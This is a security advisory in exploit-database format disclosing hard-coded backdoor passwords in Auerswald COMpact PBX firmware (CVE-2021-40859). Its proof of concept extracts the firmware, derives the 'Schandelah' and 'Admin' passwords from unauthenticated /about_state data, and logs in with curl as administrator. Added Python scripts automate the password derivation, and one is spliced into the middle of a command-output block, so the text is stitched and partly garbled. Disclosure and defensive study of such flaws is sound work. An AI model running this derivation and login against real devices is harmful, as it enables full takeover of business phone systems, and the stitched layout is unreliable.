# Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors
# Date: 06/12/2021
# Exploit Author: RedTeam Pentesting GmbH

Advisory: Auerswald COMpact Multiple Backdoors

RedTeam Pentesting discovered several backdoors in the firmware for the
Auerswald COMpact 5500R PBX. These backdoors allow attackers who are able
to access the web-based management application full administrative
access to the device.

Details
=======

Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP,
         COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R,
         COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP,
         COMmander Business(19"), COMmander Basic.2(19")
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R),
                   COMpact 5500R, COMmander 6000(R)(RX)),
                   <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog,
                   COMpact 3000 VoIP)
Fixed Versions: 8.2B, 4.0T
Vulnerability Type: Backdoor
Security Risk: high
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007
Advisory Status: published
CVE: CVE-2021-40859
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859

Introduction
============

"Fully modular VoIP appliance for more efficient communication processes

With the COMpact 5500R, you are originally equipped for everyday business
- now and in the future. The fully modular architecture with 80 IP
channels and all the functions of a large ITC server allows up to 112
subscribers and thus scales with your company. Continuous maintenance and
expansion of the system software makes this versatile IP server a
future-proof investment in any business communication."
(from the vendor's homepage)

More Details
============

Two backdoor passwords were found in the firmware of the COMpact 5500R
PBX. One backdoor password is for the secret user "Schandelah", the other
can be used for the highest-privileged user "Admin".
No way was discovered to disable these backdoors.

Proof of Concept
================

The firmware for the COMpact 5500R can be downloaded from the vendor's
homepage[1]. The following details refer to firmware version 7.8A, but
the latest firmware at the time of writing (8.0B) is affected as well.

Inspecting the downloaded file reveals that it is compressed and can be
extracted with the program "gunzip":

------------------------------------------------------------------------
$ file 7_8A_002_COMpact5500.rom
7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23
15:04:43 2020, from Unix, original size 196976698
$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz
$ gunzip 7_8A_002_COMpact5500.gz
------------------------------------------------------------------------

Analysing the resulting file again shows that it is an image file in the
format required by the bootloader "Das U-Boot"[2], a popular bootloader
for embedded devices:

------------------------------------------------------------------------
$ file 7_8A_002_COMpact5500.rom
7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,
Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38
2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC:
0xCECA93E8, Data CRC: 0x99E65DF1
------------------------------------------------------------------------

The program "dumpimage" (included with u-boot) can be used to list the
partitions in the image file:

------------------------------------------------------------------------
$ dumpimage -l 7_8A_002_COMpact5500.rom
Image Name:   CP5500 125850
Created:      Wed Sep 23 17:04:38 2020
Image Type:   ARM Linux Multi-File Image (uncompressed)
Data Size:    196976634 Bytes = 192359.99 KiB = 187.85 MiB
Load Address: 00000000
Entry Point:  00000000
Contents:
   Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB
   Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB
------------------------------------------------------------------------

The larger partition was then extracted into the file "rootfs" as
follows:

------------------------------------------------------------------------
$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs
------------------------------------------------------------------------

The file contains an ext2-compatible file system, which was mounted at
"/mnt" and inspected:

------------------------------------------------------------------------
$ file rootfs
rootfs: Linux rev 1.0 ext2 filesystem data,
UUID=c3604712-a2ca-412f-81ca-f302d7f20ef1, volume name "7.8A_002_125850."
$ sudo mount -o loop,ro rootfs /mnt
$ cat /mnt/etc/passwd
root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

The PBX runs the web server lighttpd[3]; its configuration files can be
found in the folder "/opt/auerswald/lighttpd". The web server forwards
most requests via FastCGI to the program "/opt/auerswald/web/webserver".
This program can then be analysed, for example using the reverse
engineering program Ghidra[4].

The manual for the PBX reveals that in order to manage the device, users
need to log in with the username "sub-admin". When this string is
searched for within the program in Ghidra, the function which checks
passwords on login can be identified. It can easily be seen that besides
the username "sub-admin" the function also checks for the hard-coded
username "Schandelah", the village where Auerswald is headquartered.
Further analysis revealed that the corresponding password for this
username is derived by concatenating the PBX's serial number, the string
"r2d2" and the current date, hashing the result with the MD5 hash
algorithm and taking the first seven lower-case hex characters of the
digest.
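Before turning to the password derivation, an added example for the
unpacking steps above (this is not code from the advisory or from U-Boot's
own tooling): the Python script below reproduces what "dumpimage -l" and
"dumpimage -i ... -p 1" do for a U-Boot legacy multi-file image. It decodes
the 64-byte big-endian image header, verifies the header CRC (computed with
the CRC field itself zeroed) and the CRC32 over the payload, walks the
size table that a multi-file image places in front of its sub-images
(one uint32 per part, terminated by a zero entry, every part but the last
padded to 4 bytes), and extracts one part. So that it runs offline it
builds a constructed two-part image in the same layout as the COMpact
firmware (a small first part, a larger second one); the part contents,
the image name "CP5500 sample" and the sizes are invented. Pointed at a
real ".rom" after gunzip it prints the same part list as dumpimage.

```python
"""Parse a U-Boot legacy (uImage) multi-file image and extract its parts.

Added example re-implementing the part of `dumpimage -l` / `dumpimage -i ... -p N`
used in the advisory. The sample image below is constructed, not real firmware.
"""
import struct
import sys
import zlib

IH_MAGIC = 0x27051956
IH_HEADER = struct.Struct(">IIIIIIIBBBB32s")  # 64-byte header, all fields big-endian
IH_TYPE_MULTI = 4
IH_OS_LINUX, IH_ARCH_ARM, IH_COMP_NONE = 5, 2, 0


def parse_header(blob):
    """Decode the header and verify magic and header CRC; raise ValueError on mismatch."""
    if len(blob) < IH_HEADER.size:
        raise ValueError("image shorter than a uImage header")
    (magic, hcrc, mtime, size, load, ep, dcrc,
     os_, arch, typ, comp, name) = IH_HEADER.unpack_from(blob, 0)
    if magic != IH_MAGIC:
        raise ValueError("bad magic 0x%08x" % magic)
    # The header CRC is computed over the header with ih_hcrc itself set to zero.
    zeroed = IH_HEADER.pack(magic, 0, mtime, size, load, ep, dcrc, os_, arch, typ, comp, name)
    if zlib.crc32(zeroed) != hcrc:
        raise ValueError("header CRC mismatch (corrupt or tampered header)")
    return {"time": mtime, "size": size, "load": load, "ep": ep, "dcrc": dcrc,
            "os": os_, "arch": arch, "type": typ, "comp": comp,
            "name": name.rstrip(b"\0").decode("ascii", "replace")}


def image_data(blob, hdr):
    """Return the payload after the header, verifying its length and data CRC."""
    data = blob[IH_HEADER.size:IH_HEADER.size + hdr["size"]]
    if len(data) != hdr["size"]:
        raise ValueError("truncated image data")
    if zlib.crc32(data) != hdr["dcrc"]:
        raise ValueError("data CRC mismatch (corrupt or tampered payload)")
    return data


def check_image(blob):
    """Return None if header and payload verify, otherwise the error message."""
    try:
        image_data(blob, parse_header(blob))
        return None
    except ValueError as exc:
        return str(exc)


def list_parts(blob):
    """Return (header, [sub-image sizes]), the `Contents:` list of `dumpimage -l`."""
    hdr = parse_header(blob)
    if hdr["type"] != IH_TYPE_MULTI:
        raise ValueError("not a multi-file image (type %d)" % hdr["type"])
    data = image_data(blob, hdr)
    sizes, off = [], 0
    while True:  # size table: one big-endian uint32 per part, terminated by a zero entry
        (n,) = struct.unpack_from(">I", data, off)
        off += 4
        if n == 0:
            return hdr, sizes
        sizes.append(n)


def extract_part(blob, index):
    """Return sub-image `index`; every part except the last is padded to 4 bytes."""
    hdr, sizes = list_parts(blob)
    data = image_data(blob, hdr)
    off = 4 * (len(sizes) + 1)            # skip the size table and its terminator
    for n in sizes[:index]:
        off += (n + 3) & ~3
    return data[off:off + sizes[index]]


def build_multi_image(name, parts, mtime=0):
    """Constructed multi-file image in the layout `mkimage -T multi` produces (for testing)."""
    table = b"".join(struct.pack(">I", len(p)) for p in parts) + struct.pack(">I", 0)
    padded = [p + b"\0" * ((-len(p)) % 4) for p in parts[:-1]] + parts[-1:]
    body = table + b"".join(padded)
    fields = [IH_MAGIC, 0, mtime, len(body), 0, 0, zlib.crc32(body),
              IH_OS_LINUX, IH_ARCH_ARM, IH_TYPE_MULTI, IH_COMP_NONE, name.encode("ascii")]
    fields[1] = zlib.crc32(IH_HEADER.pack(*fields))   # header CRC with ih_hcrc == 0
    return IH_HEADER.pack(*fields) + body


# Constructed sample: a 517-byte first part (odd length, so padding is exercised)
# and a 1001-byte stand-in for a root file system. Name and contents are invented.
SAMPLE_PARTS = [b"\x01" * 517, bytes(range(256)) * 3 + b"\xff" * 233]
SAMPLE_IMAGE = build_multi_image("CP5500 sample", SAMPLE_PARTS, mtime=1600873478)

if __name__ == "__main__":
    # usage: uimage.py [<image> [<part index> <output file>]]
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_IMAGE
    hdr, sizes = list_parts(blob)
    print("Image Name: %s  Data Size: %d bytes" % (hdr["name"], hdr["size"]))
    for i, n in enumerate(sizes):
        print("  Image %d: %d bytes" % (i, n))
    if len(sys.argv) > 3:
        open(sys.argv[3], "wb").write(extract_part(blob, int(sys.argv[2])))
```

Both CRCs are checked before anything is extracted, so a truncated
download or a modified header fails loudly rather than yielding a
plausible-looking but wrong file system; note that these CRCs are
integrity checks only, not signatures, so they say nothing about whether
the image is authentic.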
All data needed to derive the password can be accessed without
authentication by requesting the path "/about_state", which is also used
on the website the PBX redirects users to who abort the password prompt
(shortened and formatted to increase readability):

------------------------------------------------------------------------
$ curl --include https://192.168.1.2/about_state
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
{
  "pbx": "COMpact 5500R",
  "pbxType": 35,
  "pbxId": 0,
  "version": "Version 7.8A - Build 002",
  "serial": "1234123412",
  "date": "30.08.2021",
  [...]
}
------------------------------------------------------------------------

The password can be derived as follows:

------------------------------------------------------------------------
$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
1432d89
------------------------------------------------------------------------

This password can then be used for authentication:

------------------------------------------------------------------------
$ curl --include --user 'Schandelah:1432d89' --anyauth \
    https://192.168.1.2/tree
HTTP/1.1 302 Found
Location: /statics/html/page_servicetools.html
Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/
[...]
------------------------------------------------------------------------

Next, the endpoint "/logstatus_state" can be queried using the returned
session ID to check the access level:

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \
    https://192.168.1.2/logstatus_state
HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: application/json; charset=utf-8;
[...]
{"logstatus":"Haendler"}
------------------------------------------------------------------------

The returned access level is "Haendler" (reseller). After login, the web
server redirects to a special service page at the path
"/statics/html/page_servicetools.html".
Among other things, it allows downloading a backup of all data on the
device, configuring audio recording and resetting the password, PIN and
token for the user "Admin". Accessing regular administrative functions
directly with this user account is not possible.

When inspecting the password checking function, a second backdoor can be
found. When the username "Admin" is specified, the given password is
tested against the configured password as well as against a password
derived in a similar way from the PBX's serial number, the string "r2d2",
the current date and the configured language. The MD5 hash is taken and
the specified password is tested against the first seven characters of
the lower-case hexadecimal hash. The backdoor password for the "Admin"
user can be calculated as follows:

------------------------------------------------------------------------
$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'
92fcdd9
------------------------------------------------------------------------

The server returns a session ID for that password and the username
"Admin":

------------------------------------------------------------------------
$ curl --user 'Admin:92fcdd9' --anyauth --include \
    https://192.168.1.2/tree
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/
[...]
[{"login":3,"userId":0,"userName":"",[...]}]
------------------------------------------------------------------------

Checking the access level of the session reveals the status
"Administrator":

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \
    https://192.168.1.2/logstatus_state
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
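As an added example (not code from the advisory), the following Python
reproduces the derivation of both backdoor passwords, "Schandelah" and
"Admin", from the unauthenticated "/about_state" data: the serial number
and the device date from that response, the fixed string "r2d2", and for
the "Admin" variant the configured language code. The advisory's example
uses "DE"; the shortened "/about_state" output above does not show where
the language is exposed, so it is passed in as a parameter here. The
password rolls on the date the PBX itself reports, not on the attacker's
clock, which is why the script reads it from the response. The
is_backdoor_password function is a defender-side addition for reviewing
captured authentication attempts against the PBX: it tests an observed
password against the backdoor values for a window of days around a
reference date. The sample response is constructed from the values shown
above.

```python
"""Derive the Auerswald COMpact backdoor passwords from /about_state data.

Added example, not part of the advisory. Inputs are constructed from the
values the advisory shows; the language code is an assumption (advisory: DE).
"""
import hashlib
import json
from datetime import datetime, timedelta

BACKDOOR_SALT = "r2d2"
DATE_FMT = "%d.%m.%Y"   # the format /about_state reports, e.g. "30.08.2021"


def backdoor_password(serial, date, language=None):
    """MD5(serial + "r2d2" + date [+ language]), first 7 lower-case hex characters.

    Without a language this is the password of the hidden "Schandelah" user,
    with the configured language it is the alternative "Admin" password.
    """
    preimage = f"{serial}{BACKDOOR_SALT}{date}{language or ''}"
    return hashlib.md5(preimage.encode("ascii")).hexdigest()[:7]


def backdoor_logins(about_state_json, language):
    """Parse the unauthenticated /about_state body and return both candidate logins."""
    info = json.loads(about_state_json)
    serial, date = str(info["serial"]), info["date"]
    return {
        "Schandelah": backdoor_password(serial, date),        # "Haendler" (reseller) level
        "Admin": backdoor_password(serial, date, language),   # "Administrator" level
    }


def is_backdoor_password(serial, language, candidate, reference_date, window_days=1):
    """Defender-side check: does an observed password equal a backdoor value for any
    day within +/- window_days of reference_date? The window tolerates clock skew
    between the PBX and the system that recorded the attempt."""
    centre = datetime.strptime(reference_date, DATE_FMT)
    for delta in range(-window_days, window_days + 1):
        day = (centre + timedelta(days=delta)).strftime(DATE_FMT)
        if candidate in (backdoor_password(serial, day),
                         backdoor_password(serial, day, language)):
            return True
    return False


# Constructed sample mirroring the shortened /about_state response in the advisory.
SAMPLE_ABOUT_STATE = json.dumps({
    "pbx": "COMpact 5500R", "pbxType": 35, "pbxId": 0,
    "version": "Version 7.8A - Build 002",
    "serial": "1234123412", "date": "30.08.2021",
})

if __name__ == "__main__":
    for user, password in backdoor_logins(SAMPLE_ABOUT_STATE, "DE").items():
        print(f"{user}:{password}")
```

With the advisory's sample values the script yields the same two
passwords as the md5sum one-liners above. Since the derivation needs
nothing but data the PBX hands out without authentication, the only
effective mitigation short of the fixed firmware is keeping the
management interface off untrusted networks.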
{"logstatus":"Administrator"}
------------------------------------------------------------------------

Workaround
==========

Disable or restrict access to the web-based management interface if
possible.

Fix
===

Upgrade to a firmware version which corrects this vulnerability.

Security Risk
=============

By inspecting the firmware for the COMpact 5500R PBX, attackers can
easily discover two backdoor passwords. One password is for the secret
user account with the username "Schandelah", the other works as an
alternative password for the user "Admin". Using the backdoor, attackers
are granted access to the PBX with the highest privileges, enabling them
to completely compromise the device. The passwords are derived from the
serial number, the current date and the configured language.

The backdoor passwords are not documented. They secretly coexist with a
documented password recovery function supported by the vendor. No way was
found to disable the backdoor access. All information needed to derive
the passwords can be requested over the network without authentication,
so attackers only require network access to the web-based management
interface. Due to the ease of exploitation and severe consequences, the
backdoor passwords are rated as a high risk.
Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be
           corrected
2021-12-06 Advisory published

References
==========

[1] https://www.auerswald.de/de/support/download/firmware-compact-5500
[2] https://www.denx.de/wiki/U-Boot
[3] https://www.lighttpd.net
[4] https://ghidra-sre.org

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen